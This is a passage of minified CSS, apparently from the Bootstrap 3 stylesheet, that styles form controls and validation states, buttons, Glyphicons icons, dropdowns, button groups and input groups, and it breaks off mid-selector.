.radio, .checkbox { display: block; min-height: 20px; margin-top: 10px; margin-bottom: 10px; padding-left: 20px; } .radio label, .checkbox label { display: inline; font-weight: normal; cursor: pointer; } .radio input[type="radio"], .radio-inline input[type="radio"], .checkbox input[type="checkbox"], .checkbox-inline input[type="checkbox"] { float: left; margin-left: -20px; } .radio + .radio, .checkbox + .checkbox { margin-top: -5px; } .radio-inline, .checkbox-inline { display: inline-block; padding-left: 20px; margin-bottom: 0; vertical-align: middle; font-weight: normal; cursor: pointer; } .radio-inline + .radio-inline, .checkbox-inline + .checkbox-inline { margin-top: 0; margin-left: 10px; } input[type="radio"][disabled], input[type="checkbox"][disabled], .radio[disabled], .radio-inline[disabled], .checkbox[disabled], .checkbox-inline[disabled], fieldset[disabled] input[type="radio"], fieldset[disabled] input[type="checkbox"], fieldset[disabled] .radio, fieldset[disabled] .radio-inline, fieldset[disabled] .checkbox, fieldset[disabled] .checkbox-inline { cursor: not-allowed; } .input-sm { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.input-sm { height: 30px; line-height: 30px; } textarea.input-sm, select[multiple].input-sm { height: auto; } .input-lg { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } select.input-lg { height: 46px; line-height: 46px; } textarea.input-lg, select[multiple].input-lg { height: auto; } .has-feedback { position: relative; } .has-feedback .form-control { padding-right: 42.5px; } .has-feedback .form-control-feedback { position: absolute; top: 25px; right: 0; display: block; width: 34px; height: 34px; line-height: 34px; text-align: center; } .has-success .help-block, .has-success .control-label, .has-success .radio, .has-success .checkbox, .has-success .radio-inline, .has-success .checkbox-inline { color: #3c763d; } .has-success .form-control { border-color: #3c763d; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .has-success .form-control:focus { border-color: #2b542c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #67b168; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #67b168; } .has-success .input-group-addon { color: #3c763d; border-color: #3c763d; background-color: #dff0d8; } .has-success .form-control-feedback { color: #3c763d; } .has-warning .help-block, .has-warning .control-label, .has-warning .radio, .has-warning .checkbox, .has-warning .radio-inline, .has-warning .checkbox-inline { color: #8a6d3b; } .has-warning .form-control { border-color: #8a6d3b; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .has-warning .form-control:focus { border-color: #66512c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #c0a16b; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #c0a16b; } .has-warning .input-group-addon { color: #8a6d3b; border-color: #8a6d3b; background-color: #fcf8e3; } .has-warning .form-control-feedback { color: #8a6d3b; } .has-error .help-block, .has-error .control-label, .has-error .radio, .has-error .checkbox, .has-error .radio-inline, .has-error .checkbox-inline { color: #a94442; } .has-error .form-control { border-color: #a94442; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075); } .has-error .form-control:focus { border-color: #843534; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #ce8483; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #ce8483; } .has-error .input-group-addon { color: #a94442; border-color: #a94442; background-color: #f2dede; } .has-error .form-control-feedback { color: #a94442; } .form-control-static { margin-bottom: 0; } .help-block { display: block; margin-top: 5px; margin-bottom: 10px; color: #737373; } @media (min-width: 768px) { .form-inline .form-group { display: inline-block; margin-bottom: 0; vertical-align: middle; } .form-inline .form-control { display: inline-block; width: auto; vertical-align: middle; } .form-inline .input-group > .form-control { width: 100%; } .form-inline .control-label { margin-bottom: 0; vertical-align: middle; } .form-inline .radio, .form-inline .checkbox { display: inline-block; margin-top: 0; margin-bottom: 0; padding-left: 0; vertical-align: middle; } .form-inline .radio input[type="radio"], .form-inline .checkbox input[type="checkbox"] { float: none; margin-left: 0; } .form-inline .has-feedback .form-control-feedback { top: 0; } } .form-horizontal .control-label, .form-horizontal .radio, .form-horizontal .checkbox, .form-horizontal .radio-inline, .form-horizontal .checkbox-inline { margin-top: 0; margin-bottom: 0; padding-top: 7px; } .form-horizontal .radio, .form-horizontal .checkbox { min-height: 27px; } .form-horizontal .form-group { margin-left: -15px; margin-right: -15px; } .form-horizontal .form-control-static { padding-top: 7px; } @media (min-width: 768px) { .form-horizontal .control-label { text-align: right; } } .form-horizontal .has-feedback .form-control-feedback { top: 0; right: 15px; } .btn { display: inline-block; margin-bottom: 0; font-weight: normal; text-align: center; vertical-align: middle; cursor: pointer; background-image: none; border: 1px solid transparent; white-space: nowrap; padding: 6px 12px; font-size: 14px; line-height: 1.42857143; border-radius: 4px; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .btn:focus, .btn:active:focus, .btn.active:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .btn:hover, .btn:focus { color: #333333; text-decoration: none; } .btn:active, .btn.active { outline: 0; background-image: none; -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); } .btn.disabled, .btn[disabled], fieldset[disabled] .btn { cursor: not-allowed; pointer-events: none; opacity: 0.65; filter: alpha(opacity=65); -webkit-box-shadow: none; box-shadow: none; } .btn-default { color: #333333; background-color: #ffffff; border-color: #cccccc; } .btn-default:hover, .btn-default:focus, .btn-default:active, .btn-default.active, .open .dropdown-toggle.btn-default { color: #333333; background-color: #ebebeb; border-color: #adadad; } .btn-default:active, .btn-default.active, .open .dropdown-toggle.btn-default { background-image: none; } .btn-default.disabled, .btn-default[disabled], fieldset[disabled] .btn-default, .btn-default.disabled:hover, .btn-default[disabled]:hover, fieldset[disabled] .btn-default:hover, .btn-default.disabled:focus, .btn-default[disabled]:focus, fieldset[disabled] .btn-default:focus, .btn-default.disabled:active, .btn-default[disabled]:active, fieldset[disabled] .btn-default:active, .btn-default.disabled.active, .btn-default[disabled].active, fieldset[disabled] .btn-default.active { background-color: #ffffff; border-color: #cccccc; } .btn-default .badge { color: #ffffff; background-color: #333333; } .btn-primary { color: #ffffff; background-color: #428bca; border-color: #357ebd; } .btn-primary:hover, .btn-primary:focus, .btn-primary:active, .btn-primary.active, .open .dropdown-toggle.btn-primary { color: #ffffff; background-color: #3276b1; border-color: #285e8e; } .btn-primary:active, .btn-primary.active, .open .dropdown-toggle.btn-primary { background-image: none; } .btn-primary.disabled, .btn-primary[disabled], fieldset[disabled] .btn-primary, .btn-primary.disabled:hover, .btn-primary[disabled]:hover, fieldset[disabled] .btn-primary:hover, .btn-primary.disabled:focus, .btn-primary[disabled]:focus, fieldset[disabled] .btn-primary:focus, .btn-primary.disabled:active, .btn-primary[disabled]:active, fieldset[disabled] .btn-primary:active, .btn-primary.disabled.active, .btn-primary[disabled].active, fieldset[disabled] .btn-primary.active { background-color: #428bca; border-color: #357ebd; } .btn-primary .badge { color: #428bca; background-color: #ffffff; } .btn-success { color: #ffffff; background-color: #5cb85c; border-color: #4cae4c; } .btn-success:hover, .btn-success:focus, .btn-success:active, .btn-success.active, .open .dropdown-toggle.btn-success { color: #ffffff; background-color: #47a447; border-color: #398439; } .btn-success:active, .btn-success.active, .open .dropdown-toggle.btn-success { background-image: none; } .btn-success.disabled, .btn-success[disabled], fieldset[disabled] .btn-success, .btn-success.disabled:hover, .btn-success[disabled]:hover, fieldset[disabled] .btn-success:hover, .btn-success.disabled:focus, .btn-success[disabled]:focus, fieldset[disabled] .btn-success:focus, .btn-success.disabled:active, .btn-success[disabled]:active, fieldset[disabled] .btn-success:active, .btn-success.disabled.active, .btn-success[disabled].active, fieldset[disabled] .btn-success.active { background-color: #5cb85c; border-color: #4cae4c; } .btn-success .badge { color: #5cb85c; background-color: #ffffff; } .btn-info { color: #ffffff; background-color: #5bc0de; border-color: #46b8da; } .btn-info:hover, .btn-info:focus, .btn-info:active, .btn-info.active, .open .dropdown-toggle.btn-info { color: #ffffff; background-color: #39b3d7; border-color: #269abc; } .btn-info:active, .btn-info.active, .open .dropdown-toggle.btn-info { background-image: none; } .btn-info.disabled, .btn-info[disabled], fieldset[disabled] .btn-info, .btn-info.disabled:hover, .btn-info[disabled]:hover, fieldset[disabled] .btn-info:hover, .btn-info.disabled:focus, .btn-info[disabled]:focus, fieldset[disabled] .btn-info:focus, .btn-info.disabled:active, .btn-info[disabled]:active, fieldset[disabled] .btn-info:active, .btn-info.disabled.active, .btn-info[disabled].active, fieldset[disabled] .btn-info.active { background-color: #5bc0de; border-color: #46b8da; } .btn-info .badge { color: #5bc0de; background-color: #ffffff; } .btn-warning { color: #ffffff; background-color: #f0ad4e; border-color: #eea236; } .btn-warning:hover, .btn-warning:focus, .btn-warning:active, .btn-warning.active, .open .dropdown-toggle.btn-warning { color: #ffffff; background-color: #ed9c28; border-color: #d58512; } .btn-warning:active, .btn-warning.active, .open .dropdown-toggle.btn-warning { background-image: none; } .btn-warning.disabled, .btn-warning[disabled], fieldset[disabled] .btn-warning, .btn-warning.disabled:hover, .btn-warning[disabled]:hover, fieldset[disabled] .btn-warning:hover, .btn-warning.disabled:focus, .btn-warning[disabled]:focus, fieldset[disabled] .btn-warning:focus, .btn-warning.disabled:active, .btn-warning[disabled]:active, fieldset[disabled] .btn-warning:active, .btn-warning.disabled.active, .btn-warning[disabled].active, fieldset[disabled] .btn-warning.active { background-color: #f0ad4e; border-color: #eea236; } .btn-warning .badge { color: #f0ad4e; background-color: #ffffff; } .btn-danger { color: #ffffff; background-color: #d9534f; border-color: #d43f3a; } .btn-danger:hover, .btn-danger:focus, .btn-danger:active, .btn-danger.active, .open .dropdown-toggle.btn-danger { color: #ffffff; background-color: #d2322d; border-color: #ac2925; } .btn-danger:active, .btn-danger.active, .open .dropdown-toggle.btn-danger { background-image: none; } .btn-danger.disabled, .btn-danger[disabled], fieldset[disabled] .btn-danger, .btn-danger.disabled:hover, .btn-danger[disabled]:hover, fieldset[disabled] .btn-danger:hover, .btn-danger.disabled:focus, .btn-danger[disabled]:focus, fieldset[disabled] .btn-danger:focus, .btn-danger.disabled:active, .btn-danger[disabled]:active, fieldset[disabled] .btn-danger:active, .btn-danger.disabled.active, .btn-danger[disabled].active, fieldset[disabled] .btn-danger.active { background-color: #d9534f; border-color: #d43f3a; } .btn-danger .badge { color: #d9534f; background-color: #ffffff; } .btn-link { color: #428bca; font-weight: normal; cursor: pointer; border-radius: 0; } .btn-link, .btn-link:active, .btn-link[disabled], fieldset[disabled] .btn-link { background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .btn-link, .btn-link:hover, .btn-link:focus, .btn-link:active { border-color: transparent; } .btn-link:hover, .btn-link:focus { color: #2a6496; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover, fieldset[disabled] .btn-link:hover, .btn-link[disabled]:focus, fieldset[disabled] .btn-link:focus { color: #999999; text-decoration: none; } .btn-lg, .btn-group-lg > .btn { padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } .btn-sm, .btn-group-sm > .btn { padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-xs, .btn-group-xs > .btn { padding: 1px 5px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-block { display: block; width: 100%; padding-left: 0; padding-right: 0; } .btn-block + .btn-block { margin-top: 5px; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .fade { opacity: 0; -webkit-transition: opacity 0.15s linear; transition: opacity 0.15s linear; } .fade.in { opacity: 1; } .collapse { display: none; } .collapse.in { display: block; } .collapsing { position: relative; height: 0; overflow: hidden; -webkit-transition: height 0.35s ease; transition: height 0.35s ease; } @font-face { font-family: 'Glyphicons Halflings'; src: url('../fonts/glyphicons-halflings-regular.eot'); src: url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../fonts/glyphicons-halflings-regular.woff') format('woff'), url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg'); } .glyphicon { position: relative; top: 1px; display: inline-block; font-family: 'Glyphicons Halflings'; font-style: normal; font-weight: normal; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .glyphicon-asterisk:before { content: "\2a"; } .glyphicon-plus:before { content: "\2b"; } .glyphicon-euro:before { content: "\20ac"; } .glyphicon-minus:before { content: "\2212"; } .glyphicon-cloud:before { content: "\2601"; } .glyphicon-envelope:before { content: "\2709"; } .glyphicon-pencil:before { content: "\270f"; } .glyphicon-glass:before { content: "\e001"; } .glyphicon-music:before { content: "\e002"; } .glyphicon-search:before { content: "\e003"; } .glyphicon-heart:before { content: "\e005"; } .glyphicon-star:before { content: "\e006"; } .glyphicon-star-empty:before { content: "\e007"; } .glyphicon-user:before { content: "\e008"; } .glyphicon-film:before { content: "\e009"; } .glyphicon-th-large:before { content: "\e010"; } .glyphicon-th:before { content: "\e011"; } .glyphicon-th-list:before { content: "\e012"; } .glyphicon-ok:before { content: "\e013"; } .glyphicon-remove:before { content: "\e014"; } .glyphicon-zoom-in:before { content: "\e015"; } .glyphicon-zoom-out:before { content: "\e016"; } .glyphicon-off:before { content: "\e017"; } .glyphicon-signal:before { content: "\e018"; } .glyphicon-cog:before { content: "\e019"; } .glyphicon-trash:before { content: "\e020"; } .glyphicon-home:before { content: "\e021"; } .glyphicon-file:before { content: "\e022"; } .glyphicon-time:before { content: "\e023"; } .glyphicon-road:before { content: "\e024"; } .glyphicon-download-alt:before { content: "\e025"; } .glyphicon-download:before { content: "\e026"; } .glyphicon-upload:before { content: "\e027"; } .glyphicon-inbox:before { content: "\e028"; } .glyphicon-play-circle:before { content: "\e029"; } .glyphicon-repeat:before { content: "\e030"; } .glyphicon-refresh:before { content: "\e031"; } .glyphicon-list-alt:before { content: "\e032"; } .glyphicon-lock:before { content: "\e033"; } .glyphicon-flag:before { content: "\e034"; } .glyphicon-headphones:before { content: "\e035"; } .glyphicon-volume-off:before { content: "\e036"; } .glyphicon-volume-down:before { content: "\e037"; } .glyphicon-volume-up:before { content: "\e038"; } .glyphicon-qrcode:before { content: "\e039"; } .glyphicon-barcode:before { content: "\e040"; } .glyphicon-tag:before { content: "\e041"; } .glyphicon-tags:before { content: "\e042"; } .glyphicon-book:before { content: "\e043"; } .glyphicon-bookmark:before { content: "\e044"; } .glyphicon-print:before { content: "\e045"; } .glyphicon-camera:before { content: "\e046"; } .glyphicon-font:before { content: "\e047"; } .glyphicon-bold:before { content: "\e048"; } .glyphicon-italic:before { content: "\e049"; } .glyphicon-text-height:before { content: "\e050"; } .glyphicon-text-width:before { content: "\e051"; } .glyphicon-align-left:before { content: "\e052"; } .glyphicon-align-center:before { content: "\e053"; } .glyphicon-align-right:before { content: "\e054"; } .glyphicon-align-justify:before { content: "\e055"; } .glyphicon-list:before { content: "\e056"; } .glyphicon-indent-left:before { content: "\e057"; } .glyphicon-indent-right:before { content: "\e058"; } .glyphicon-facetime-video:before { content: "\e059"; } .glyphicon-picture:before { content: "\e060"; } .glyphicon-map-marker:before { content: "\e062"; } .glyphicon-adjust:before { content: "\e063"; } .glyphicon-tint:before { content: "\e064"; } .glyphicon-edit:before { content: "\e065"; } .glyphicon-share:before { content: "\e066"; } .glyphicon-check:before { content: "\e067"; } .glyphicon-move:before { content: "\e068"; } .glyphicon-step-backward:before { content: "\e069"; } .glyphicon-fast-backward:before { content: "\e070"; } .glyphicon-backward:before { content: "\e071"; } .glyphicon-play:before { content: "\e072"; } .glyphicon-pause:before { content: "\e073"; } .glyphicon-stop:before { content: "\e074"; } .glyphicon-forward:before { content: "\e075"; } .glyphicon-fast-forward:before { content: "\e076"; } .glyphicon-step-forward:before { content: "\e077"; } .glyphicon-eject:before { content: "\e078"; } .glyphicon-chevron-left:before { content: "\e079"; } .glyphicon-chevron-right:before { content: "\e080"; } .glyphicon-plus-sign:before { content: "\e081"; } .glyphicon-minus-sign:before { content: "\e082"; } .glyphicon-remove-sign:before { content: "\e083"; } .glyphicon-ok-sign:before { content: "\e084"; } .glyphicon-question-sign:before { content: "\e085"; } .glyphicon-info-sign:before { content: "\e086"; } .glyphicon-screenshot:before { content: "\e087"; } .glyphicon-remove-circle:before { content: "\e088"; } .glyphicon-ok-circle:before { content: "\e089"; } .glyphicon-ban-circle:before { content: "\e090"; } .glyphicon-arrow-left:before { content: "\e091"; } .glyphicon-arrow-right:before { content: "\e092"; } .glyphicon-arrow-up:before { content: "\e093"; } .glyphicon-arrow-down:before { content: "\e094"; } .glyphicon-share-alt:before { content: "\e095"; } .glyphicon-resize-full:before { content: "\e096"; } .glyphicon-resize-small:before { content: "\e097"; } .glyphicon-exclamation-sign:before { content: "\e101"; } .glyphicon-gift:before { content: "\e102"; } .glyphicon-leaf:before { content: "\e103"; } .glyphicon-fire:before { content: "\e104"; } .glyphicon-eye-open:before { content: "\e105"; } .glyphicon-eye-close:before { content: "\e106"; } .glyphicon-warning-sign:before { content: "\e107"; } .glyphicon-plane:before { content: "\e108"; } .glyphicon-calendar:before { content: "\e109"; } .glyphicon-random:before { content: "\e110"; } .glyphicon-comment:before { content: "\e111"; } .glyphicon-magnet:before { content: "\e112"; } .glyphicon-chevron-up:before { content: "\e113"; } .glyphicon-chevron-down:before { content: "\e114"; } .glyphicon-retweet:before { content: "\e115"; } .glyphicon-shopping-cart:before { content: "\e116"; } .glyphicon-folder-close:before { content: "\e117"; } .glyphicon-folder-open:before { content: "\e118"; } .glyphicon-resize-vertical:before { content: "\e119"; } .glyphicon-resize-horizontal:before { content: "\e120"; } .glyphicon-hdd:before { content: "\e121"; } .glyphicon-bullhorn:before { content: "\e122"; } .glyphicon-bell:before { content: "\e123"; } .glyphicon-certificate:before { content: "\e124"; } .glyphicon-thumbs-up:before { content: "\e125"; } .glyphicon-thumbs-down:before { content: "\e126"; } .glyphicon-hand-right:before { content: "\e127"; } .glyphicon-hand-left:before { content: "\e128"; } .glyphicon-hand-up:before { content: "\e129"; } .glyphicon-hand-down:before { content: "\e130"; } .glyphicon-circle-arrow-right:before { content: "\e131"; } .glyphicon-circle-arrow-left:before { content: "\e132"; } .glyphicon-circle-arrow-up:before { content: "\e133"; } .glyphicon-circle-arrow-down:before { content: "\e134"; } .glyphicon-globe:before { content: "\e135"; } .glyphicon-wrench:before { content: "\e136"; } .glyphicon-tasks:before { content: "\e137"; } .glyphicon-filter:before { content: "\e138"; } .glyphicon-briefcase:before { content: "\e139"; } .glyphicon-fullscreen:before { content: "\e140"; } .glyphicon-dashboard:before { content: "\e141"; } .glyphicon-paperclip:before { content: "\e142"; } .glyphicon-heart-empty:before { content: "\e143"; } .glyphicon-link:before { content: "\e144"; } .glyphicon-phone:before { content: "\e145"; } .glyphicon-pushpin:before { content: "\e146"; } .glyphicon-usd:before { content: "\e148"; } .glyphicon-gbp:before { content: "\e149"; } .glyphicon-sort:before { content: "\e150"; } .glyphicon-sort-by-alphabet:before { content: "\e151"; } .glyphicon-sort-by-alphabet-alt:before { content: "\e152"; } .glyphicon-sort-by-order:before { content: "\e153"; } .glyphicon-sort-by-order-alt:before { content: "\e154"; } .glyphicon-sort-by-attributes:before { content: "\e155"; } .glyphicon-sort-by-attributes-alt:before { content: "\e156"; } .glyphicon-unchecked:before { content: "\e157"; } .glyphicon-expand:before { content: "\e158"; } .glyphicon-collapse-down:before { content: "\e159"; } .glyphicon-collapse-up:before { content: "\e160"; } .glyphicon-log-in:before { content: "\e161"; } .glyphicon-flash:before { content: "\e162"; } .glyphicon-log-out:before { content: "\e163"; } .glyphicon-new-window:before { content: "\e164"; } .glyphicon-record:before { content: "\e165"; } .glyphicon-save:before { content: "\e166"; } .glyphicon-open:before { content: "\e167"; } .glyphicon-saved:before { content: "\e168"; } .glyphicon-import:before { content: "\e169"; } .glyphicon-export:before { content: "\e170"; } .glyphicon-send:before { content: "\e171"; } .glyphicon-floppy-disk:before { content: "\e172"; } .glyphicon-floppy-saved:before { content: "\e173"; } .glyphicon-floppy-remove:before { content: "\e174"; } .glyphicon-floppy-save:before { content: "\e175"; } .glyphicon-floppy-open:before { content: "\e176"; } .glyphicon-credit-card:before { content: "\e177"; } .glyphicon-transfer:before { content: "\e178"; } .glyphicon-cutlery:before { content: "\e179"; } .glyphicon-header:before { content: "\e180"; } .glyphicon-compressed:before { content: "\e181"; } .glyphicon-earphone:before { content: "\e182"; } .glyphicon-phone-alt:before { content: "\e183"; } .glyphicon-tower:before { content: "\e184"; } .glyphicon-stats:before { content: "\e185"; } .glyphicon-sd-video:before { content: "\e186"; } .glyphicon-hd-video:before { content: "\e187"; } .glyphicon-subtitles:before { content: "\e188"; } .glyphicon-sound-stereo:before { content: "\e189"; } .glyphicon-sound-dolby:before { content: "\e190"; } .glyphicon-sound-5-1:before { content: "\e191"; } .glyphicon-sound-6-1:before { content: "\e192"; } .glyphicon-sound-7-1:before { content: "\e193"; } .glyphicon-copyright-mark:before { content: "\e194"; } .glyphicon-registration-mark:before { content: "\e195"; } .glyphicon-cloud-download:before { content: "\e197"; } .glyphicon-cloud-upload:before { content: "\e198"; } .glyphicon-tree-conifer:before { content: "\e199"; } .glyphicon-tree-deciduous:before { content: "\e200"; } .caret { display: inline-block; width: 0; height: 0; margin-left: 2px; vertical-align: middle; border-top: 4px solid; border-right: 4px solid transparent; border-left: 4px solid transparent; } .dropdown { position: relative; } .dropdown-toggle:focus { outline: 0; } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 160px; padding: 5px 0; margin: 2px 0 0; list-style: none; font-size: 14px; background-color: #ffffff; border: 1px solid #cccccc; border: 1px solid rgba(0, 0, 0, 0.15); border-radius: 4px; -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175); box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175); background-clip: padding-box; } .dropdown-menu.pull-right { right: 0; left: auto; } .dropdown-menu .divider { height: 1px; margin: 9px 0; overflow: hidden; background-color: #e5e5e5; } .dropdown-menu > li > a { display: block; padding: 3px 20px; clear: both; font-weight: normal; line-height: 1.42857143; color: #333333; white-space: nowrap; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus { text-decoration: none; color: #262626; background-color: #f5f5f5; } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus { color: #ffffff; text-decoration: none; outline: 0; background-color: #428bca; } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #999999; } .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { text-decoration: none; background-color: transparent; background-image: none; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); cursor: not-allowed; } .open > .dropdown-menu { display: block; } .open > a { outline: 0; } .dropdown-menu-right { left: auto; right: 0; } .dropdown-menu-left { left: 0; right: auto; } .dropdown-header { display: block; padding: 3px 20px; font-size: 12px; line-height: 1.42857143; color: #999999; } .dropdown-backdrop { position: fixed; left: 0; right: 0; bottom: 0; top: 0; z-index: 990; } .pull-right > .dropdown-menu { right: 0; left: auto; } .dropup .caret, .navbar-fixed-bottom .dropdown .caret { border-top: 0; border-bottom: 4px solid; content: ""; } .dropup .dropdown-menu, .navbar-fixed-bottom .dropdown .dropdown-menu { top: auto; bottom: 100%; margin-bottom: 1px; } @media (min-width: 768px) { .navbar-right .dropdown-menu { left: auto; right: 0; } .navbar-right .dropdown-menu-left { left: 0; right: auto; } } .btn-group, .btn-group-vertical { position: relative; display: inline-block; vertical-align: middle; } .btn-group > .btn, .btn-group-vertical > .btn { position: relative; float: left; } .btn-group > .btn:hover, .btn-group-vertical > .btn:hover, .btn-group > .btn:focus, .btn-group-vertical > .btn:focus, .btn-group > .btn:active, .btn-group-vertical > .btn:active, .btn-group > .btn.active, .btn-group-vertical > .btn.active { z-index: 2; } .btn-group > .btn:focus, .btn-group-vertical > .btn:focus { outline: none; } .btn-group .btn + .btn, .btn-group .btn + .btn-group, .btn-group .btn-group + .btn, .btn-group .btn-group + .btn-group { margin-left: -1px; } .btn-toolbar { margin-left: -5px; } .btn-toolbar .btn-group, .btn-toolbar .input-group { float: left; } .btn-toolbar > .btn, .btn-toolbar > .btn-group, .btn-toolbar > .input-group { margin-left: 5px; } .btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) { border-radius: 0; } .btn-group > .btn:first-child { margin-left: 0; } .btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) { border-bottom-right-radius: 0; border-top-right-radius: 0; } .btn-group > .btn:last-child:not(:first-child), .btn-group > .dropdown-toggle:not(:first-child) { border-bottom-left-radius: 0; border-top-left-radius: 0; } .btn-group > .btn-group { float: left; } .btn-group > .btn-group:not(:first-child):not(:last-child) > .btn { border-radius: 0; } .btn-group > .btn-group:first-child > .btn:last-child, .btn-group > .btn-group:first-child > .dropdown-toggle { border-bottom-right-radius: 0; border-top-right-radius: 0; } .btn-group > .btn-group:last-child > .btn:first-child { border-bottom-left-radius: 0; border-top-left-radius: 0; } .btn-group .dropdown-toggle:active, .btn-group.open .dropdown-toggle { outline: 0; } .btn-group > .btn + .dropdown-toggle { padding-left: 8px; padding-right: 8px; } .btn-group > .btn-lg + .dropdown-toggle { padding-left: 12px; padding-right: 12px; } .btn-group.open .dropdown-toggle { -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); } .btn-group.open .dropdown-toggle.btn-link { -webkit-box-shadow: none; box-shadow: none; } .btn .caret { margin-left: 0; } .btn-lg .caret { border-width: 5px 5px 0; border-bottom-width: 0; } .dropup .btn-lg .caret { border-width: 0 5px 5px; } .btn-group-vertical > .btn, .btn-group-vertical > .btn-group, .btn-group-vertical > .btn-group > .btn { display: block; float: none; width: 100%; max-width: 100%; } .btn-group-vertical > .btn-group > .btn { float: none; } .btn-group-vertical > .btn + .btn, .btn-group-vertical > .btn + .btn-group, .btn-group-vertical > .btn-group + .btn, .btn-group-vertical > .btn-group + .btn-group { margin-top: -1px; margin-left: 0; } .btn-group-vertical > .btn:not(:first-child):not(:last-child) { border-radius: 0; } .btn-group-vertical > .btn:first-child:not(:last-child) { border-top-right-radius: 4px; border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn:last-child:not(:first-child) { border-bottom-left-radius: 4px; border-top-right-radius: 0; border-top-left-radius: 0; } .btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn { border-radius: 0; } .btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child, .btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle { border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child { border-top-right-radius: 0; border-top-left-radius: 0; } .btn-group-justified { display: table; width: 100%; table-layout: fixed; border-collapse: separate; } .btn-group-justified > .btn, .btn-group-justified > .btn-group { float: none; display: table-cell; width: 1%; } .btn-group-justified > .btn-group .btn { width: 100%; } [data-toggle="buttons"] > .btn > input[type="radio"], [data-toggle="buttons"] > .btn > input[type="checkbox"] { display: none; } .input-group { position: relative; display: table; border-collapse: separate; } .input-group[class*="col-"] { float: none; padding-left: 0; padding-right: 0; } .input-group .form-control { position: relative; z-index: 2; float: left; width: 100%; margin-bottom: 0; } .input-group-lg > .form-control, .input-group-lg > .input-group-addon, .input-group-lg > .input-group-btn > .btn { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } select.input-group-lg > .form-control, select.input-group-lg > .input-group-addon, select.input-group-lg > .input-group-btn > .btn { height: 46px; line-height: 46px; } textarea.input-group-lg > .form-control, textarea.input-group-lg > .input-group-addon, textarea.input-group-lg > .input-group-btn > .btn, select[multiple].input-group-lg > .form-control, select[multiple].input-group-lg > .input-group-addon, select[multiple].input-group-lg > .input-group-btn > .btn { height: auto; } .input-group-sm > .form-control, .input-group-sm > .input-group-addon, .input-group-sm > .input-group-btn > .btn { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.input-group-sm > .form-control, select.input-group-sm > .input-group-addon, select.input-group-sm > .input-group-btn > .btn { height: 30px; line-height: 30px; } textarea.input-group-sm > .form-control, textarea.input-group-sm > .input-group-addon, textarea.input-group-sm > .input-group-btn > .btn, select[multiple].input-group-sm > .form-control, select[multiple].input-group-sm > .input-group-addon, select[multiple].input-group-sm > .input-group-btn > .btn { height: auto; } .input-group-addon, .input-group-btn, .input-group .form-control { display: table-cell; } .input-group-addon:not(:first-child):not(:last-child), .input-group-btn:not(:first-child):not(:last-child), .input-group .form-control:not(:first-child):not(:last-child) { border-radius: 0; } .input-group-addon, .input-group-btn { width: 1%; white-space: nowrap; vertical-align: middle; } .input-group-addon { padding: 6px 12px; font-size: 14px; font-weight: normal; line-height: 1; color: #555555; text-align: center; background-color: #eeeeee; border: 1px solid #cccccc; border-radius: 4px; } .input-group-addon.input-sm { padding: 5px 10px; font-size: 12px; border-radius: 3px; } .input-group-addon.input-lg { padding: 10px 16px; font-size: 18px; border-radius: 6px; } .input-group-addon input[type="radio"], .input-group-addon input[type="checkbox"] { margin-top: 0; } .input-group .form-control:first-child, .input-group-addon:first-child, .input-group-btn:first-child > .btn, .input-group-btn:first-child > .btn-group > .btn, .input-group-btn:first-child > 